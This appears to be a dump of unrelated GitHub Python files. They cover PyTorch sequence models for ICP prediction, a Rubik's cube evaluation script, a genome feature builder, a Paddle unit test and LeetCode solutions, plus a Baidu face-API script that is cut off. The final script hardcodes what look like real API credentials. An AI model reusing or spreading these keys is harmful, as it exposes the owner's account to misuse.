torch.optim.AdamW(self.parameters(),\n lr=self.lr,#5e-5,\n betas=(0.9, 0.98),\n eps=1e-6,\n weight_decay=self.weight_decay)\n \n self.scheduler = torch.optim.lr_scheduler.OneCycleLR(optimizer, self.lr, steps_per_epoch=self.steps_per_epoch, epochs=self.max_epochs, pct_start=0.05)\n scheduler = {\"scheduler\": self.scheduler, \n \"interval\": \"step\" } # necessary to make PL call the scheduler.step after every batch\n return [optimizer], [scheduler]\n \n\n def calc_loss(self, inputs, targets, hiddens=None, lens=None):\n # pred\n if hiddens is None:\n preds = self(inputs, lens=lens)\n else:\n preds = self(inputs, hiddens=hiddens, lens=lens)\n # calc loss\n loss = self.loss_func(preds, targets)\n return loss, preds\n \n \n ### The two following functions fix the 'UserWarning: Detected call of `lr_scheduler.step()` before `optimizer.step()`'\n # will be patched in later versions of PyTorch-lightning\n def optimizer_step(self, epoch, 
batch_idx, optimizer, optimizer_idx, optimizer_closure, **kwargs):\n self.should_skip_lr_scheduler_step = False\n scaler = getattr(self.trainer.strategy.precision_plugin, \"scaler\", None)\n if scaler:\n scale_before_step = scaler.get_scale()\n optimizer.step(closure=optimizer_closure)\n if scaler:\n scale_after_step = scaler.get_scale()\n self.should_skip_lr_scheduler_step = scale_before_step > scale_after_step\n\n def lr_scheduler_step(self, scheduler, optimizer_idx, metric):\n if self.should_skip_lr_scheduler_step:\n return\n scheduler.step()\n\n \nclass LitCLIP(LitSeqModel):\n def __init__(self, *args, \n clip_name=\"ViT-B/16\",\n **kwargs):\n super().__init__(*args, **kwargs)\n \n self.clip_name = clip_name\n \n import clip\n clip_model, transform = clip.load(clip_name, device=\"cpu\", jit=False)\n \n # get relevant clip layers\n self.transformer = clip_model.transformer\n self.token_embedding = clip_model.token_embedding\n self.positional_embedding = clip_model.positional_embedding\n self.ln_final = clip_model.ln_final\n # freeze attention layers\n for n, p in self.transformer.named_parameters():\n p.requires_grad = \"mlp\" in n or \"ln\" in n\n \n # define own mapping layers\n self.input_mapping = torch.nn.Linear(self.num_recurrent_inputs + self.num_static_inputs, self.token_embedding.weight.shape[1])\n self.out_mapping = torch.nn.Linear(self.transformer.width, 1)\n \n def make_preds(self, x, lens=None):\n # x = [BS, seq_len, feats]\n \n #x = self.token_embedding(text)#.type(self.dtype) # [batch_size, n_ctx, d_model]\n x = self.input_mapping(x)\n \n x = x + self.positional_embedding#.type(self.dtype)\n x = x.permute(1, 0, 2) # NLD -> LND\n x = self.transformer(x)\n x = x.permute(1, 0, 2) # LND -> NLD\n x = self.ln_final(x) #.type(self.dtype)\n\n # x.shape = [batch_size, n_ctx, transformer.width]\n # take features from the eot embedding (eot_token is the highest number in each sequence) if we only want a single embedding for the sentence\n #x = x[torch.arange(x.shape[0]), text.argmax(dim=-1)] @ self.text_projection\n #x = x[torch.arange(x.shape[0]), lens] @ self.text_projection\n \n # make prediction for each time-step\n x = self.out_mapping(x)\n return x\n \n \ndef load_gpt_model(name, use_adapter=False, reduction_factor=2):\n device = torch.device(\"cpu\")\n if name == \"neo1.3\":\n from transformers import GPTNeoForCausalLM, GPT2Tokenizer\n gpt_tokenizer = GPT2Tokenizer.from_pretrained(\"EleutherAI/gpt-neo-1.3B\")\n gpt_model = GPTNeoForCausalLM.from_pretrained(\"EleutherAI/gpt-neo-1.3B\", pad_token_id=gpt_tokenizer.eos_token_id)\n elif name == \"neo2.7\":\n from transformers import GPTNeoForCausalLM, GPT2Tokenizer\n gpt_tokenizer = GPT2Tokenizer.from_pretrained(\"EleutherAI/gpt-neo-2.7B\")\n gpt_model = GPTNeoForCausalLM.from_pretrained(\"EleutherAI/gpt-neo-2.7B\", pad_token_id=gpt_tokenizer.eos_token_id)\n elif \"gpt2\" in name:\n from transformers import GPT2LMHeadModel, GPT2Tokenizer\n gpt_tokenizer = GPT2Tokenizer.from_pretrained(name)\n if use_adapter:\n from transformers import GPT2AdapterModel\n gpt_model = GPT2AdapterModel.from_pretrained(name, pad_token_id=gpt_tokenizer.eos_token_id)\n # task adapter - only add if not existing\n \n \n import transformers\n config = transformers.PfeifferConfig({\n \"reduction_factor\": reduction_factor,\n },\n reduction_factor=reduction_factor)\n\n gpt_model.add_adapter(\"icp\", config=config, overwrite_ok=False, set_active=True) \n \n # Enable adapter training\n gpt_model.train_adapter(\"icp\")\n #gpt_model.set_active_adapters(\"icp\")\n 
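# note: train_adapter() is documented to freeze the base model weights and make only the named adapter trainable\n 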
else:\n gpt_model = GPT2LMHeadModel.from_pretrained(name, pad_token_id=gpt_tokenizer.eos_token_id) \n \n gpt_model = gpt_model.to(device)\n return gpt_model, gpt_tokenizer\n\n\ndef apply_train_mode_gpt(mode, model):\n # freeze certain layers\n if mode == \"freeze\":\n for p in model.parameters():\n p.requires_grad = False\n elif mode == \"train_norm\":\n for n, p in model.named_parameters():\n p.requires_grad = \"ln_\" in n\n elif mode == \"full\":\n for p in model.parameters():\n p.requires_grad = True\n elif mode == \"train_mlp_norm\":\n for n, p in model.named_parameters():\n p.requires_grad = \"ln_\" in n or \"mlp\" in n\n elif mode == \"adapters\":\n #return # the adapters library handles this\n for n, p in model.named_parameters():\n p.requires_grad = \"adapter\" in n or \"ln_\" in n\n\n \nclass LitGPT(LitSeqModel):\n def __init__(self, *args, \n gpt_name=\"gpt2\",\n mode=\"train_mlp_norm\",\n pretrained=True,\n reduction_factor=2,\n **kwargs):\n super().__init__(*args, **kwargs)\n self.use_adapter = \"adapter\" in mode\n self.gpt_name = gpt_name\n # load model\n self.model, self.tokenizer = load_gpt_model(gpt_name, use_adapter=self.use_adapter, reduction_factor=reduction_factor)\n # re-init weights if not using pretrained\n if not pretrained:\n self.model.init_weights() #.apply(self.model._init_weights) \n\n # freeze some params\n apply_train_mode_gpt(mode, self.model)\n # get width\n self.width = self.model.transformer.wte.weight.shape[1]\n # create input and output layers\n self.input_mapping = torch.nn.Linear(self.num_recurrent_inputs + self.num_static_inputs, self.width)\n self.out_mapping = torch.nn.Linear(self.width, 1, bias=False)\n self.out_norm = torch.nn.LayerNorm(self.width)\n # replace output layer by our newly initialized one\n #self.model.transformer.wte = self.input_mapping\n #self.model.lm_head = self.out_mapping\n #self.model.add_classification_head(\"icp\", num_labels=1, activation_function=\"linear\")\n \n \n def make_preds(self, x, lens=None):\n # x = [BS, seq_len, feats]\n #print(x.shape)\n x = self.input_mapping(x)\n x = self.model(inputs_embeds=x) \n x = x[\"last_hidden_state\"]\n x = self.out_norm(x)\n x = self.out_mapping(x)\n #print(x.shape)\n #x = self.model(x)[\"logits\"]\n return x\n\n \nclass LitTransformer(LitSeqModel):\n def __init__(self, *args,\n num_transformer_blocks=3,\n hidden_size=512, \n n_heads=8,\n **kwargs):\n super().__init__(*args, **kwargs)\n \n self.out_size = 1\n self.hidden_size = hidden_size\n \n from torch.nn import TransformerEncoder, TransformerEncoderLayer\n \n self.pos_encoder = PositionalEncoding(hidden_size, self.dropout)\n encoder_layers = TransformerEncoderLayer(hidden_size, n_heads, \n hidden_size * 4, self.dropout, \n batch_first=True,\n norm_first=False)\n self.transformer_encoder = TransformerEncoder(encoder_layers, num_transformer_blocks)\n self.encoder = torch.nn.Linear(self.num_recurrent_inputs, hidden_size)\n self.decoder = torch.nn.Linear(hidden_size, 1)\n \n \n def make_preds(self, x, lens=None):\n # 1. map to tokens\n x = self.encoder(x) * math.sqrt(self.hidden_size)\n # 2. add positional encoding\n x = self.pos_encoder(x)\n # 3. apply transformer\n src_mask = generate_square_subsequent_mask(x.shape[1]).to(x.device).to(x.dtype)\n x = self.transformer_encoder(x, src_mask)\n # 4. 
map to output\n x = self.decoder(x)\n return x\n\n \ndef generate_square_subsequent_mask(sz: int) -> torch.Tensor:\n \"\"\"\n Generates an upper-triangular matrix of -inf, with zeros on diag.\n Is used in the causal transformer modelling such that tokens can only attend to past tokens. \n \"\"\"\n return torch.triu(torch.ones(sz, sz) * float('-inf'), diagonal=1)\n\n\nclass PositionalEncoding(torch.nn.Module):\n\n def __init__(self, d_model: int, dropout: float = 0.1, max_len: int = 5000):\n super().__init__()\n self.dropout = torch.nn.Dropout(p=dropout)\n\n position = torch.arange(max_len).unsqueeze(1)\n div_term = torch.exp(torch.arange(0, d_model, 2) * (-math.log(10000.0) / d_model))\n pe = torch.zeros(max_len, 1, d_model)\n pe[:, 0, 0::2] = torch.sin(position * div_term)\n pe[:, 0, 1::2] = torch.cos(position * div_term)\n self.register_buffer('pe', pe)\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n \"\"\"\n Args:\n x: Tensor, shape [seq_len, batch_size, embedding_dim]\n \"\"\"\n x = x + self.pe[:x.size(0)]\n return self.dropout(x)\n\n \nclass LitMLP(LitSeqModel):\n def __init__(self, \n *args, \n hidden_size=256, \n **kwargs):\n super().__init__(*args, **kwargs)\n self.save_hyperparameters() \n \n self.hidden_size = hidden_size\n self.out_size = 1\n \n # define model\n # static part\n if self.static_idcs is not None:\n self.encode_static = torch.nn.Sequential(\n torch.nn.Linear(self.num_static_inputs, self.hidden_size),\n torch.nn.ReLU(True),\n torch.nn.Linear(self.hidden_size, self.hidden_size),\n #torch.nn.LayerNorm(normalized_shape=[self.hidden_size]),\n torch.nn.ReLU(True),\n )\n # recurrent part\n self.encode_recurrent = torch.nn.Sequential(\n torch.nn.Linear(self.num_recurrent_inputs, self.hidden_size),\n torch.nn.ReLU(True),\n torch.nn.Linear(self.hidden_size, self.hidden_size),\n #torch.nn.LayerNorm(normalized_shape=[self.hidden_size]),\n torch.nn.ReLU(True),\n )\n # out part\n self.out_mlp = torch.nn.Sequential(\n torch.nn.Linear(self.hidden_size, self.hidden_size), \n torch.nn.ReLU(True),\n torch.nn.Linear(self.hidden_size, self.out_size))\n \n def make_preds(self, x, lens=None, hiddens=None):\n # encode\n x = self.encode_recurrent(x)\n x = self.out_mlp(x)\n return x\n \n def make_preds_old(self, \n x: torch.Tensor, \n lens: Optional[torch.Tensor] = None, \n hiddens: Optional[Tuple[torch.Tensor, torch.Tensor]] = None):\n # encode recurrence using mlp\n recurrent_stream = x[..., self.recurrent_idcs]\n recurrent_stream = self.encode_recurrent(recurrent_stream)\n \n # encode static inputs\n if self.static_idcs is not None:\n static_stream = x[..., self.static_idcs]\n static_stream = self.encode_static(static_stream)\n else:\n static_stream = 0\n \n # apply mlp to transform \n x = self.out_mlp(static_stream + recurrent_stream)\n return x\n\n\nclass LitRNN(LitSeqModel):\n def __init__(self, *args, hidden_size=256, rnn_layers=1, rnn_type=\"lstm\", use_lens=False,\n use_in_mapping=False, use_out_mapping=False,\n **kwargs):\n super().__init__(*args, **kwargs)\n self.save_hyperparameters()\n \n self.hidden_size = hidden_size\n self.out_size = 1\n self.use_lens = use_lens\n self.use_in_mapping = use_in_mapping\n self.use_out_mapping = use_out_mapping\n \n # define model\n # recurrent part\n rnn_args = [self.hidden_size if use_in_mapping else self.num_recurrent_inputs,\n self.hidden_size if use_out_mapping else self.out_size,\n ]\n rnn_kwargs = {\"num_layers\": rnn_layers,\n \"batch_first\": True,\n \"dropout\": self.dropout if rnn_layers > 1 else 0}\n if rnn_type == 
\"lstm\":\n self.rnn = torch.nn.LSTM(*rnn_args, **rnn_kwargs)\n elif rnn_type == \"gru\":\n self.rnn = torch.nn.GRU(*rnn_args, **rnn_kwargs)\n #self.layer_norm = torch.nn.LayerNorm(normalized_shape=[self.hidden_size])\n \n # static part\n if self.static_idcs is not None:\n self.encode_static = torch.nn.Sequential(\n torch.nn.Linear(self.num_static_inputs, self.hidden_size),\n torch.nn.ReLU(True),\n torch.nn.Linear(self.hidden_size, self.hidden_size),\n torch.nn.LayerNorm(normalized_shape=[self.hidden_size]),\n torch.nn.ReLU(True),\n )\n # out part\n if use_out_mapping:\n self.out_mlp = torch.nn.Sequential(\n torch.nn.Linear(self.hidden_size, self.hidden_size), \n torch.nn.ReLU(True),\n torch.nn.Linear(self.hidden_size, self.out_size))\n if use_in_mapping:\n self.in_mlp = torch.nn.Sequential(\n torch.nn.Linear(self.num_recurrent_inputs, self.hidden_size), \n torch.nn.ReLU(True),\n torch.nn.Linear(self.hidden_size, self.hidden_size))\n self.hiddens = (torch.zeros(0), torch.zeros(0)) # init for TorchScript\n \n def make_preds(self, x, lens=None):\n if self.use_in_mapping:\n x = self.in_mlp(x)\n # apply rnn\n if lens is not None and self.use_lens:\n x = pack_padded_sequence(x, lens.cpu(), batch_first=True, enforce_sorted=False)\n x, self.hiddens = self.rnn(x)\n if lens is not None and self.use_lens:\n x, lens = pad_packed_sequence(x, batch_first=True)\n # apply mlp to transform \n if self.use_out_mapping:\n x = self.out_mlp(x)\n return x\n \n \n def make_preds_old(self, \n x: torch.Tensor, \n lens: Optional[torch.Tensor] = None, \n hiddens: Optional[Tuple[torch.Tensor, torch.Tensor]] = None):\n \n # encode recurrence using rnn\n recurrent_stream = x[..., self.recurrent_idcs]\n if lens is not None:\n recurrent_stream = pack_padded_sequence(recurrent_stream, lens.cpu(), batch_first=True, enforce_sorted=False)\n recurrent_stream, self.hiddens = self.rnn(recurrent_stream)\n if lens is not None:\n recurrent_stream, lens = pad_packed_sequence(recurrent_stream, batch_first=True)\n #recurrent_stream = self.layer_norm(recurrent_stream)\n \n # encode static inputs\n if self.static_idcs is not None:\n static_stream = x[..., self.static_idcs]\n static_stream = self.encode_static(static_stream)\n else:\n static_stream = 0\n \n # apply mlp to transform \n x = self.out_mlp(static_stream + recurrent_stream)\n return x\n\n\nclass SequentialLoss(torch.nn.Module):#jit.ScriptModule):\n def __init__(self, regression, use_macro_loss, pos_weight, use_huber):\n super().__init__()\n self.regression = regression\n self.use_macro_loss = use_macro_loss\n self.pos_weight = pos_weight\n \n if regression:\n if use_huber:\n self.loss_func = torch.nn.SmoothL1Loss(reduction='mean')\n else:\n self.loss_func = torch.nn.MSELoss(reduction='mean')\n else:\n self.loss_func = torch.nn.BCEWithLogitsLoss(reduction='mean', pos_weight=pos_weight)\n\n def __call__(self, pred: torch.Tensor, target: torch.Tensor):\n \"\"\"Calculates the loss and considers missing values in the loss given by mask indicating where targets are NaN\"\"\"\n # shape: [BS, LEN, FEATS]\n mask = ~torch.isnan(target)\n \n if self.use_macro_loss:\n # Apply mask:\n num_feats = target.shape[-1]\n pred_per_pat = [pred_p[mask_p].reshape(-1, num_feats) for pred_p, mask_p in zip(pred, mask) if sum(mask_p) > 0]\n target_per_pat = [target_p[mask_p].reshape(-1, num_feats) for target_p, mask_p in zip(target, mask) if sum(mask_p) > 0]\n # calc raw loss per patient\n loss_per_pat = [self.loss_func(p, t) for p, t in zip(pred_per_pat, target_per_pat)]\n loss = 
torch.stack(loss_per_pat).mean()\n\n #if torch.isinf(loss) or torch.isnan(loss):\n # print(\"Found NAN or inf loss!\")\n # print(loss)\n # raise ValueError(\"Found NAN or inf!\")\n else:\n #print(pred.shape, target.shape, mask.shape)\n loss = self.loss_func(pred[mask], target[mask])\n\n return loss\n","repo_name":"agschweingruber/icp-pred","sub_path":"icp_pred/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":27575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"39939745972","text":"import os\nimport argparse\n\nimport time\nimport pdb\nimport sys\nsys.path.append('./cube')\n\nimport pickle\nimport pandas as pd\nfrom multiprocessing import Pool\nimport numpy as np\nfrom tqdm import tqdm\nfrom utils import check_memory\nfrom str_cube import *\n\nTOL = 1e-4\n\nif os.path.exists('/local/hopan'):\n PREFIX = '/local/hopan/cube'\nelif os.path.exists('/scratch/hopan'):\n PREFIX = '/scratch/hopan/cube'\nelse:\n PREFIX = '/project2/risi/cube/'\n\ndef load_cube_df(nrows=None):\n df = pd.read_csv(os.path.join(PREFIX, 'cube_sym_mod.txt'), header=None, dtype={0:str, 1:int}, nrows=nrows)\n df.columns = ['cube', 'distance']\n return df\n\ndef load_cube_df_indexed(nrows=None):\n df = pd.read_csv(os.path.join(PREFIX, 'cube_sym_mod.txt'), header=None, dtype={0:str, 1:int}, nrows=nrows)\n df.columns = ['cube', 'distance', ]\n df['index'] = df.index\n df = df.set_index('cube')\n return df\n\ndef load_pkls():\n with open('/local/hopan/cube/cube2_pkls/idx_to_nbrs.pkl', 'rb') as f:\n idx_to_nbrs = pickle.load(f)\n with open('/local/hopan/cube/cube2_pkls/idx_to_cube.pkl', 'rb') as f:\n idx_to_cube = pickle.load(f)\n with open('/local/hopan/cube/cube2_pkls/idx_to_dist.pkl', 'rb') as f:\n idx_to_dist = pickle.load(f)\n with open('/local/hopan/cube/cube2_pkls/cube_to_idx.pkl', 'rb') as f:\n cube_to_idx = pickle.load(f)\n\n return idx_to_nbrs, idx_to_cube, idx_to_dist, cube_to_idx\n\ndef par_main(par_f, ncpu):\n global all_df\n all_df = load_cube_df_indexed()\n start = time.time()\n df_chunk = np.array_split(all_df, ncpu)\n idx_to_nbrs, idx_to_cube, idx_to_dist, cube_to_idx = load_pkls()\n arg_tups = [(idx, _d) for idx, _d in enumerate(df_chunk)]\n\n print('Starting par proc with {} processes...'.format(ncpu))\n check_memory()\n with Pool(ncpu) as p:\n map_res = p.starmap(par_f, arg_tups)\n\n print('Elapsed proc time: {:.2f}min'.format( (time.time() - start) / 60. 
))\n return map_res\n\ndef irrep_feval(alpha, parts):\n fname_fmt = os.path.join(PREFIX, 'fourier_eval_sym_all/{}/{}.npy')\n print(fname_fmt)\n return np.load(fname_fmt.format(alpha, parts))\n\ndef par_irrep_main(par_f, alpha, parts, ncpu):\n global all_df\n all_df = load_cube_df_indexed()\n df_chunk = np.array_split(all_df[:20000], ncpu)\n real_mat = irrep_feval(alpha, parts).real\n arg_tups = [(idx, _d, real_mat) for idx, _d in enumerate(df_chunk)]\n\n print('Before pool | ', end='')\n check_memory()\n\n with Pool(ncpu) as p:\n map_res = p.starmap(par_f, arg_tups)\n par_correct, par_chosen_cubes = zip(*map_res) \n\n cat_correct = np.concatenate(par_correct)\n cat_chosen = np.concatenate(par_chosen_cubes)\n\n return cat_correct, cat_chosen\n\ndef proc_baseline(idx, df):\n '''\n df: dataframe whose index is cube strings\n '''\n global all_df\n props = np.zeros(len(df))\n i = 0\n for c in tqdm(df.index):\n nbrs = neighbors_fixed_core_small(c)\n nbr_df = all_df.loc[nbrs]\n nbr_idx = nbr_df['index'] # need this for indexing into mat\n min_dist = nbr_df.distance.min()\n min_cubes = nbr_df[nbr_df.distance == min_dist]\n\n props[i] = len(min_cubes) / len(nbrs)\n i += 1\n\n print('Proc {:2} done'.format(idx))\n return props\n\ndef proc_baseline_df(idx, df, mat):\n global all_df\n i = 0\n start =time.time()\n correct = np.zeros(len(df))\n chosen_cubes = np.zeros(len(df), dtype=int)\n\n print('Proc {:2} started | '.format(idx), end='')\n check_memory()\n \n for c in (df.index):\n nbrs = neighbors_fixed_core_small(c)\n nbr_df = all_df.loc[nbrs]\n nbr_idx = nbr_df['index'] # need this for indexing into mat\n min_dist = nbr_df.distance.min()\n min_cubes = nbr_df[nbr_df.distance == min_dist]\n\n vals = mat[nbr_idx]\n n_idx = np.argmin(vals)\n min_irrep_cube = nbrs[n_idx] # this gives the index\n correct[i] = (min_irrep_cube in min_cubes.index)\n chosen_cubes[i] = all_df.loc[min_irrep_cube]['index']\n i += 1\n\n end = time.time()\n print('Proc {:2} done: {:.2f}mins'.format(idx, (end - start) / 60.))\n return correct, chosen_cubes\n\n\ndef maybe_mkdir(d):\n try:\n os.makedirs(d)\n except:\n print('Already exists: {}'.format(d))\n\nif __name__ == '__main__':\n start = time.time()\n parser = argparse.ArgumentParser()\n parser.add_argument('--alpha', type=str, default='(2, 3, 3)')\n parser.add_argument('--parts', type=str, default='((2,), (1, 1, 1), (1, 1, 1))')\n parser.add_argument('--ncpu', type=int, default=8, help='Amount of parallelism')\n parser.add_argument('--baseline', action='store_true')\n parser.add_argument('--savedir', type=str, default=os.path.join(PREFIX, 'fourier_eval_results'))\n args = parser.parse_args()\n\n if args.baseline:\n random_baseline_fname = os.path.join(args.savedir, 'baseline')\n res = par_main(proc_baseline, args.ncpu)\n print('Avg: {:.5f}'.format(np.mean(res)))\n np.save(random_baseline_fname, res)\n else:\n alpha = eval(args.alpha)\n parts = eval(args.parts)\n correct, chosen = par_irrep_main(proc_baseline_df, alpha, parts, args.ncpu)\n print('{:.8f}|{}|{}'.format(np.mean(correct), alpha, parts))\n\n corr_dir = os.path.join(args.savedir, str(alpha), str(parts))\n chos_dir = os.path.join(args.savedir, str(alpha), str(parts))\n maybe_mkdir(corr_dir)\n maybe_mkdir(chos_dir)\n\n corr_fname = os.path.join(corr_dir, 'correct.npy')\n chos_fname = os.path.join(chos_dir, 'chosen.npy')\n print('Saving to: {}'.format(corr_fname))\n print('Saving to: {}'.format(chos_fname))\n np.save(corr_fname, correct)\n np.save(chos_fname, chosen)\n elapsed_time = (time.time() - start) / 60.\n 
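# wall-clock duration of the whole run, converted to minutes and reported below\n 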
print('Done! Total time: {:.2f}mins'.format(elapsed_time))\n","repo_name":"horacepan/SnFFT","sub_path":"compute_policy.py","file_name":"compute_policy.py","file_ext":"py","file_size_in_byte":5880,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"19109892445","text":"import pandas as pd\nimport os\n\n\ndef build_feature_matrix(antibiotic='ciprofloxacin', group='Proteobacteria', threshold=0.05):\n\n folder = os.path.join('data_files', 'subproblems', group + '_' + antibiotic, 'sp_genes')\n\n #lists for DataFrame\n ids = []\n antibiotics = []\n phenotypes = []\n annotation = []\n features = []\n\n # set of functions shared by every genome, filled in below\n functions = None\n\n ids_dict = {}\n\n for directory in os.listdir(folder):\n genome = directory.split('_')[0]\n spgenes_file = genome + '.PATRIC.spgene.tab'\n feat_dict = {}\n df = pd.read_csv(os.path.join(folder, directory, spgenes_file), sep='\t')\n for function in df['function']:\n if type(function) is str:\n if function not in feat_dict.keys():\n feat_dict[function] = 1\n else:\n feat_dict[function] += 1\n ids_dict[genome] = feat_dict\n\n # seed with the first genome's functions, then intersect with the rest;\n # intersecting with an initially empty set would always yield an empty feature set\n for id in ids_dict.keys():\n if functions is None:\n functions = set(ids_dict[id].keys())\n else:\n functions = functions.intersection(set(ids_dict[id].keys()))\n\n if antibiotic == 'ciprofloxacin':\n pheno_file = os.path.join('data_files', 'proteobacteria_ciprofloxacin.csv')\n elif antibiotic == 'betalactam':\n pheno_file = os.path.join('data_files', 'betalactam_firmicutes_samples.csv')\n elif antibiotic == 'erythromycin':\n pheno_file = os.path.join('data_files', 'erythromycin_firmicutes_samples.csv')\n\n pheno_df = pd.read_csv(pheno_file)\n if 'Genome ID' in pheno_df.columns:\n pheno_df.rename(columns={'Genome ID': 'ID'}, inplace=True)\n if 'Resistance Phenotype' in pheno_df.columns:\n pheno_df.rename(columns={'Resistance Phenotype': 'Phenotype'}, inplace=True)\n\n for id in ids_dict.keys():\n ids.append(id)\n antibiotics.append([antibiotic])\n phenotypes.append([pheno_df['Phenotype'][pheno_df['ID'].tolist().index(id)]])\n annotation.append(['True'])\n genome_features = []\n for func in functions:\n genome_features.append(ids_dict[id][func])\n features.append(genome_features)\n\n file_dict = {'ID': ids, 'Antibiotic': antibiotics, 'Phenotype': phenotypes, 'Annotation': annotation, 'Features': features}\n file_df = pd.DataFrame(file_dict)\n #Creating file from which the X matrix (feature matrix) and the y vector (target values vector) can be created\n file_df.to_csv(os.path.join('data_files', group + '_' + antibiotic + '_sample.csv'), index=False)\n\nif __name__ == \"__main__\":\n build_feature_matrix()\n","repo_name":"Elliot-L/DendroNet","sub_path":"patric_application/build_features_file.py","file_name":"build_features_file.py","file_ext":"py","file_size_in_byte":2469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"36029793381","text":"import unittest\n\nimport numpy as np\nfrom op_test import OpTest\n\nimport paddle\nfrom paddle import base\n\n\ndef size_wrapper(input):\n return paddle.numel(paddle.to_tensor(input))\n\n\nclass TestSizeOp(OpTest):\n def setUp(self):\n self.op_type = \"size\"\n self.python_api = size_wrapper\n self.shape = []\n self.config()\n input = np.zeros(self.shape, dtype='bool')\n self.inputs = {'Input': input}\n self.outputs = {'Out': np.array(np.size(input), dtype='int64')}\n\n def config(self):\n pass\n\n def test_check_output(self):\n self.check_output()\n\n\nclass TestRank1Tensor(TestSizeOp):\n def config(self):\n self.shape = [2]\n\n\nclass TestRank2Tensor(TestSizeOp):\n def 
config(self):\n self.shape = [2, 3]\n\n\nclass TestRank3Tensor(TestSizeOp):\n def config(self):\n self.shape = [2, 3, 100]\n\n\nclass TestLargeTensor(TestSizeOp):\n def config(self):\n self.shape = [2**10]\n\n\nclass TestSizeAPI(unittest.TestCase):\n def test_size_static(self):\n main_program = base.Program()\n startup_program = base.Program()\n with base.program_guard(main_program, startup_program):\n shape1 = [2, 1, 4, 5]\n shape2 = [1, 4, 5]\n x_1 = paddle.static.data(shape=shape1, dtype='int32', name='x_1')\n x_2 = paddle.static.data(shape=shape2, dtype='int32', name='x_2')\n input_1 = np.random.random(shape1).astype(\"int32\")\n input_2 = np.random.random(shape2).astype(\"int32\")\n out_1 = paddle.numel(x_1)\n out_2 = paddle.numel(x_2)\n exe = paddle.static.Executor(place=paddle.CPUPlace())\n res_1, res_2 = exe.run(\n feed={\n \"x_1\": input_1,\n \"x_2\": input_2,\n },\n fetch_list=[out_1, out_2],\n )\n np.testing.assert_array_equal(\n res_1, np.array(np.size(input_1)).astype(\"int64\")\n )\n np.testing.assert_array_equal(\n res_2, np.array(np.size(input_2)).astype(\"int64\")\n )\n\n def test_size_imperative(self):\n paddle.disable_static(paddle.CPUPlace())\n input_1 = np.random.random([2, 1, 4, 5]).astype(\"int32\")\n input_2 = np.random.random([1, 4, 5]).astype(\"int32\")\n x_1 = paddle.to_tensor(input_1)\n x_2 = paddle.to_tensor(input_2)\n out_1 = paddle.numel(x_1)\n out_2 = paddle.numel(x_2)\n np.testing.assert_array_equal(out_1.numpy().item(0), np.size(input_1))\n np.testing.assert_array_equal(out_2.numpy().item(0), np.size(input_2))\n paddle.enable_static()\n\n def test_error(self):\n main_program = base.Program()\n startup_program = base.Program()\n with base.program_guard(main_program, startup_program):\n\n def test_x_type():\n shape = [1, 4, 5]\n input_1 = np.random.random(shape).astype(\"int32\")\n out_1 = paddle.numel(input_1)\n\n self.assertRaises(TypeError, test_x_type)\n\n\nif __name__ == '__main__':\n paddle.enable_static()\n unittest.main()\n","repo_name":"PaddlePaddle/Paddle","sub_path":"test/legacy_test/test_size_op.py","file_name":"test_size_op.py","file_ext":"py","file_size_in_byte":3139,"program_lang":"python","lang":"en","doc_type":"code","stars":21032,"dataset":"github-code","pt":"29"} +{"seq_id":"23258897423","text":"class Solution:\n def isPalindrome(self, s):\n i, j = 0, len(s) - 1\n while i < j:\n while i < j and not s[i].isalnum():\n i += 1\n while i < j and not s[j].isalnum():\n j -= 1\n if s[i].lower() != s[j].lower():\n return False\n i, j = i + 1, j - 1\n return True\n\n\nif __name__ == \"__main__\":\n s = \" A man, a plan, a canal; panama \"\n sol = Solution()\n print(s)\n print(sol.isPalindrome(s))","repo_name":"codingyen/CodeAlone","sub_path":"Python/0125_valid_palindrome.py","file_name":"0125_valid_palindrome.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"5787694274","text":"'''\n- Using max heap, removing half of the topmost value.\n- Increment count by 1.\n'''\nclass Solution:\n def halveArray(self, nums: List[int]) -> int:\n req = sum(nums)\n tot = req\n req = req/2\n for i in range(len(nums)):\n nums[i] = -nums[i]\n heapq.heapify(nums)\n count = 0\n while len(nums)>0 and tot>req:\n cur = -heapq.heappop(nums)\n nex = cur/2\n diff = cur-nex\n tot-=diff\n if nex>0:\n heapq.heappush(nums,-nex)\n count+=1\n return count","repo_name":"shivamnegi1705/Leetcode-Contests","sub_path":"Biweekly Contest 74/2208. 
Minimum Operations to Halve Array Sum.py","file_name":"2208. Minimum Operations to Halve Array Sum.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"19621094586","text":"# -*- coding: utf-8 -*-\n# @Time: 2020/6/15 23:03\n# @Author: GraceKoo\n# @File: interview_24.py\n# @Desc: https://leetcode-cn.com/problems/er-cha-shu-zhong-he-wei-mou-yi-zhi-de-lu-jing-lcof/solution/\n\nfrom typing import List\n\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass Solution:\n def pathSum(self, root: TreeNode, sum: int) -> List[List[int]]:\n res, path = [], [] # holds the final results and the path currently being traversed\n\n # takes the node currently being visited and the current remaining target value\n def recur(root, tar):\n if not root:\n return\n path.append(root.val)\n tar -= root.val\n if tar == 0 and not root.left and not root.right:\n res.append(list(path))\n # if a complete path was just recorded, the two calls below simply return, so this is still correct\n recur(root.left, tar)\n recur(root.right, tar)\n path.pop()\n\n recur(root, sum)\n return res\n","repo_name":"asdf2014/algorithm","sub_path":"Codes/gracekoo/interview_24.py","file_name":"interview_24.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","stars":216,"dataset":"github-code","pt":"29"} +{"seq_id":"40344416865","text":"#coding=utf-8 \r\nfrom aip import AipFace\r\nimport base64\r\nimport chardet\r\n\r\nAPP_ID = '11312620'\r\nAPI_KEY = 'DRnZxYs8pt07OSPUCxXpuiIS'\r\nSECRET_KEY = 'UnGXXwkbPxVSAyooEd8WvDzL0VvajVVq'\r\n\r\nclient = AipFace(APP_ID, API_KEY, SECRET_KEY)\r\n\r\n# base64-encode the image file\r\ndef get_file_content(filePath):\r\n with 